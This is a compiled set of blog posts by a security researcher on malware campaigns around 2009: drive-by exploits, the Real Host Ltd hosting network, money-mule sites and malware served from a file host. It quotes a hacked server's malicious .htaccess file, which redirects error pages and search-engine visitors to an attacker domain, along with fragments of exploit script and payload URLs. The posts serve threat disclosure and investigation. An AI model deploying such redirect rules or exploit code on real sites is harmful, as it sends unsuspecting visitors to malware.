Andrew Martin

Starting sometime around November 6th, many attacks were observed coming from strangely named domains such as us.bf9.info, us.bp0.info, us.bn3.info, etc. The attackers employed some code splitting techniques to make their scripts more stealthy by moving suspicious shellcode from inside the primary exploit script to a secondary script. The attacks were being delivered through advertisements which also made investigating the source a pain. Performing some searches on the domains strangely did not yield any information from common sources such as malwareurl, malwaredomainlist, McAfee Site Adviser, etc.

To get to the root of the problem, Afilias (the company responsible for .info domains) and GoDaddy (the registrar) were involved to investigate. They quickly blocked the offending domains once it was clear they were hostile. What was very surprising was the end result, GoDaddy removed 711 domains that were affiliated with this attack!

Attack scripts:

hxxp://us.hn0.info/f/1/ie.html

http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372

hxxp://us.hn0.info/f/1/ff.html

http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360

hxxp://us.hn0.info/f/1/cosplay.swf
http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&type=swf

Shellcode:
http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262

The domains:

I’m a few days late for posting this but the HostExploit team has produced another report, this time on an attack dubbed “MalFI” for malicious file inclusion. This encompasses remote file inclusion (RFI), local file inclusion (LFI) and Cross Server Attack (XSA). The report had been in the works for quite some time and while I was not a main author this time, Jart Armin and Scott Logan worked with me to interpret and use my honeypot data that I’ve been collecting over the last several months.

Rather than rehash the purpose for the report, here’s an excerpt from the abstract:

MALfi “A Silent Threat”

What is it all about, MALfi? A blended threat currently detected on around 350,000 websites &
Internet servers. One major purpose is to establish, “use once and throw away” disposable
botnets for spam, phishing, DDoS and exploits.
Full Report (public version) download PDF – hostexploit Download page = http://bit.ly/eoO4C

Abstract / Press Release

MALfi is a holistic and descriptive term applied to adequately describe the recent blended attack
utilized by hackers and cyber criminals to compromise websites and servers. This is
combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack),
and RCE (remote code execution).

Conservative estimates over recent months indicate around 350,000 affected websites and
servers worldwide. hostexploit and associated researchers have tracked 103,351 attacks,
involving 2,743 unique IP addresses, with 85 countries involved in RFI scanning and 911 ASNs
involved.

Check out the report for our research and findings. A more detailed version will also be made available to key members of the security and law enforcement communities.

With all the talk about Chinese malware authors and groups of attackers supposedly sponsored by governments out there, I thought I would publish a find of mine from back in 2007. Excellent research has been done on this topic with one of the most interesting events being the discovery of GhostNet.

The following message was discovered in a HTML comment section inside a hostile script. I found the page hosting the script by searching for a string inside an ANI exploit on Google in May 2007.

天高云淡，正宜一马奔腾，青春年少，我自纵横驰骋，这是一个只承认强者的时代，然而学习正是赋予了我们作强者的资本，物竟天择，适者生存，只有不断的学习我们才不会被社所会淘汰，我们才会逐渐变强，珍惜你生命中的每一分钟无学习，你会发现平凡的你一样很优秀，当你在风烛残年的那一刻时，面对你的朋友，爱人，儿子，不会因碌碌无为而羞耻，不会因年华虚度而悔恨，你会发现当你,把你的你的青春变的更加劲直和充满活力的时候，曾经无奈与迷茫的你，现在是那样的精彩与辉煌黑域战盟一个，和平，博爱，互助，不会有任何的技术歧视的技术团体，诚心邀请您的加盟楚蓝枫QQ4998XXXXX

This translates to:

It is a clear day, suitable for horse gallops.  The youth is young; he can advance freely and quickly.

This is the era which appreciates only the strong, the survival of the fittest; yet study is the capital which empowers us to become strong. Only through continuous learning we will not be eliminated, we will become stronger and stronger. Cherish every minute of life with learning, you will find yourself as extraordinary as others. When you become old, in the face of your friends, wife, son, you will not feel shame and regret because you did not waste time when you were young; you will find yourself so wonderful when you contributed your vibrant youth into something meaningful, and changed yourself from once a helpless and confused you to someone brilliant.QQ4998XXXXX

Interesting message they were trying to get across isn’t it?

MessageLabs wrote a nice report summarizing key events from August and it turns out our work was more widely felt than believed. Apparently part of Cutwail’s C&C infrastructure resided inside Real Host’s network. When they got cut off, SPAM levels dropped but only briefly since there were more C&Cs elsewhere to pick up the slack.

Here’s an excerpt from the report, to bad they didn’t credit our work

“Real Host was disconnected by its upstream providers on 1 August 2009. The impact was immediately felt, as can be seen in Figure 1, where spam volumes dropped briefly by as much as 38% in the subsequent 48-hour period.

Much of this spam was linked to the Cutwail botnet, currently one of the largest botnets and responsible for approximately 15-20% of all spam. Its activity levels fell by as much as 90% when Real Host was taken offline, but quickly recovered in a matter of days.”

Now that the report has hit mainstream media outlets, I am pleased to report that Real Host has been taken down. Score another one for the good guys!

The story was first published by the Financial Times of London

With follow up stories from:

Network World

The Inquirer

CIO Magazine

Information Security Magazine

Sunbelt Software

Computer World UK

And many more!

A couple of days ago I was investigating an attack that a reader submitted to me that was related to the recent nine ball attacks as reported by WebSense. (Part 1 | Part 2)

The attackers use the same techniques to exploit victims but this time have moved to new domains and updated their payloads. There are 2 payloads dropped on compromised hosts at the end of the attacks that steal banking credentials and send SPAM. These payloads are delivered by multiple exploits including  an unpatched 0day vulnerability and a previously unpatched one.

Directshow – MS09-028 (previously a 0day, patched recently)

function directshow()
{
var shellcode=unescape(”%uC033….

obj.data=’./directshow.php’;
obj.classid=’clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF’;

Microsoft Office Web Components (unpatched 0day)

function spreadsheet()
{
try
{
var objspread=new ActiveXObject(’OWC10.Spreadsheet’);
}

After conducting further research on 71speed.info and finding it hosted by Real Host Ltd of Latvia it quickly became apparent how bad this host is. A quick search leads to a blog written by Dynamoo where the activities of this host are first uncovered. Delving deeper into this provider  it is apparent that they are a major hub of cybercrime activity which we will discuss further. This post has been prepared in conjunction with Jart Armin from HostExploit.com. Jart will present a higher level view of Real Host’s activities in relation to other entities and most interestingly how they related to the former Russian Business Network (RBN).

It should be noted that many of these sites are no longer reachable due to swift efforts by registrar Directi.

Observed Hostile Activity:

• Exploits including unpatched (or soon to be patched) 0days
• Payloads to drop on victim PCs including: fake codecs, banking trojans, spambots, fake anti virus, downloaders and even a Mac trojan
• Phishing sites
• Moneymule recruitment sites
• Botnet Command and Control servers
• Hosting of cybercrime websites – Iframe programs
• Distributing licensed software (Warez)

Real Host has 3 /28 IP blocks (48 IPs) that they get from Junik (AS8206), these are:

inetnum: 213.182.197.0 – 213.182.197.15
netname: Real_Host_NET3
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.224 – 213.182.197.239
netname: Real_Host_NET1
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.240 – 213.182.197.255
netname: Real_Host_NET2
descr: Real Host
country: LV
abuse-mailbox: abusemailhost@gmail.com

The first indication of suspicious activity is the use of gmail addresses as abuse contacts.

Next, here is data from my security tools showing attacks and the dates associated with them:

A little manual investigation led me to the following:

The domain I found most amusing was botnet.su, the attackers clearly aren’t trying to hide their motives on this one! This domain was previously used by the RBN along with NewskyAG and others. More on this link can be found at hostexploit.com.

Zeus seems to be one of the most common threats being hosted from Real Host’s network. According to recent information released by Damballa, Zeus is the #1 botnet in the US with an estimated 3.6 million PCs compromised.

To begin, let’s look at the money mule sites the Barwells Group and NewskyAG, here is an excerpt from the link included above:

BarwellsGroup

“During the trial period (1 month), you will be paid 2000 USD per month
while working on average 3 hours per day, Monday-Friday, plus 5
commission from every transactions or task received and processed. The
salary will be sent in the form of wire transfer directly to your
account. After the trial period your base pay salary will go up to
3,500USD per month, plus 5 commission.”

Clearly this is a money mule recruitment program. Sounds pretty good for 3 hours work per day, maybe I should quit my day job!

NewskyAG

Not only does this domain operate a money mule scam, it also ran a Zeus C&C server. What is scary is that people actually fall prey to this scheme as shown by this quote from yahoo answers:

Q: “Anyone ever heard of a company called NewSky Ag?”

A: “Yes I work for them from home and so far everything is ok but I’ve only been doing it about 2 months so if you have any more ? please let me know”

Next we have a phish for a Russian social networking site

Lastly lets look at iframepartners.com, the site is currently down however information is still available. The site pays malicious web admins to put iframes on their compromised websites. A colleague of mine was kind enough to translate the text from Russian (thanks Alex!). It reads:

1. A partner pays for iframe traffic, we accept only us, gb, it, au, and it will be in average from $1 to $20 for 1K depending on traffic quality

2. We accept only ads that generate more that 50K USA traffic

3. You are prohibited to install anything else with our iframe

4. Adult traffic is not welcomed

5. An account will be deleted without payout in case of detection of spam or worm traffic

6. We have been deleting accounts that are not active for few days

7. Cheaters and hit-boters, please don’t waste our time, look for other places

8. Payout twice a month, in the beginning and in the middle of month
Use XXX XXXXXX to contact us

Notice how adult sites, worms and spam traffic is not allowed? This is probably due to the fact that they are very noisy and easily spotted by security professionals.

This leads to another site called installing.cc. This site pays for installing malware onto compromised PCs.

Another interesting hit comes up from a design company called web-alfa.com. They designed an eye catching flash banner advertisement for the attackers.

The slides in the flash movie say:

Long-live substitution,

And software sale,

Referral system,

And other life enjoyments

For invitation and detailed information contact us via XXX XXXXXX

Clearly Real Host Ltd is hosting major cybercrime activity as a vast number of IPs in their space host malicious content. Several of the domains hosted with them were used by the former RBN. Real Host represents a major threat to individuals, business and the safety of the Internet ecosystem.

As a follow up to my previous post, here is the next video depicting the second portion of the attack. For URLs, Virustotal results, etc refer back to Part 1. All analysis is conducted with Malzilla.

To give you some additional insight into the attack, I am also able to share the contents of a hacked server’s .htaccess file. The miscreants upload this file to automatically redirect visitors to a site under their control.

These lines will redirect all requests for 400,401,403,404 and 500 pages to ake.kz, the attacker controlled site.

ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

The following entries check to see if a user has been referred to the compromised website by a search engine. If they have, they will be automatically forwarded on to the attacker’s site, ake.kz

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]

A reader was gracious enough to share some information with me on the events surrounding the compromise of a website of his. The site was compromised via stolen FTP credentials which has been a technique employed by major Internet threats such as Gumblar and Nine-ball recently. This will be a two part post.

Lets take a look at what happens to the victim webserver after it gets compromised and the malware involved. To make this post more interesting I’ve decided to deliver my analysis via video! Rather than the standard nerve grating rock music that people tend to add to videos like this I have opted for my genre of choice, electronic . I’ve included virus total results, domains involved, etc at the end of the post.

Sit back, relax and enjoy the ride.

Domains / URLs involved:

71speed.info
xbx.tw/in.cgi?6
xbx.tw/in.cgi?3
zyejanag.cn/rf/
fvuligir.cn/s/in.cgi?11
84.244.138.58/ts/in.cgi?chtr&5f9d90
esli.tw/load.php?e=1
esli.tw/2/index.php
esli.tw/show.php?s=18f8bc6e98

Exploits Used:

MDAC -- MS06-014
Adobe Acroat -- CVE-2008-2992 & CVE-2009-0927
Adobe Flash Player (not sure which one)
Microsoft DirectShow & Office Web Components zero days
Microsoft Snapshot Viewer MS08-041

Virustotal Payload 1 & ThreatExpert Payload 1 -- SilentBanker -- Banking Trojan

Virustotal Payload 2 & ThreatExpert Payload 2 -- Tedroo -- SpamBot

Wepawet PDF exploit

It’s been awhile since I posted unfortunately, but it’s not due to a lack of attacks to talk about! Some time ago I was approached by the Host Exploit open source security research group and they asked me if I would help contribute to their efforts. This is the group that put together research that led to the McColo, Atrivo and EST domains take downs. Since I’m always trying to get the word out on attacks and threats, the answer was quite obvious.

So this means my spare time has been mostly spent contributing to the next major report from the HostExploit team. Look for it in the coming weeks, it’s going to be very juicy

While this is not totally new, I only recently came across my first event involving a one click host serving  malware. What is one click hosting? These are providers which you have probably heard of before such as RapidShare, Megaupload, yousendit and many many more. Wikipedia has a listing of many of them. These providers allow you to share files via HTTP for free or a small fee for premium service.

In the last few weeks (beginning June 17th), a particular OCH (one click host) hotlinkfiles.com began serving up malware. The host uses AV according to a March 25th, 2008 post on their website:

“Today we introduce a new feature of virus scanning on all uploaded files. This is part of our service to protect you from downloading any virus. The feature is seamlessly integrated into Hotlinkfiles.com, our anti-virus software will automatically perform a scan on all uploaded files and will reject any infected file.”

The malware being served must be going undetected by whatever AV hotlinkfiles.com is using. Here is what is being served:

Notice the use of premium.hotlinkfiles.com? This means the attacker has either bought an account or has used a account stolen from an unsuspecting victim.

Detection for the first stage download is pretty good at 30/41, most vendors detect it as Banload which is also classed as a banking trojan. [Virustotal1] [Virustotal2]

Downloader.Banload.AMIX
Win-Trojan/Banload.71680.O
Win32/TrojanDownloader.Banload.BDA

PWS-Banker!ee
Mal_Banker

The file downloads several more payloads which are all executables [Threatexpert] however the detection rate is terrible on them with most being detected by 0/41 vendors. [Virustotal]

hxxp://gay24×01.hpg.ig.com.br/ree1.html
hxxp://gay24×01.hpg.ig.com.br/ree2.html
hxxp://gay24×02.hpg.ig.com.br/nl2.html
hxxp://gay24×02.hpg.ig.com.br/nl3.html
hxxp://gay24×02.hpg.ig.com.br/nl4.html
hxxp://gay24×02.hpg.ig.com.br/nl5.html
hxxp://gay24×02.hpg.ig.com.br/nl6.html
hxxp://gay24×02.hpg.ig.com.br/nl7.html

So what does this mean? Since sites like hotlinkfiles.com are perfectly legitimate, web content filtering will not block them. The second stage URL can still be blocked, however it can change and analysis must be performed before the second stage URL can be found. In a corporate environment, you may want to consider blocking these file transfer services if they are not needed.

As for where this attack came from, it was delivered via SPAM with a subject line of “fotos [date]” and is written in Portuguese. The text reads “These photos are very funny”.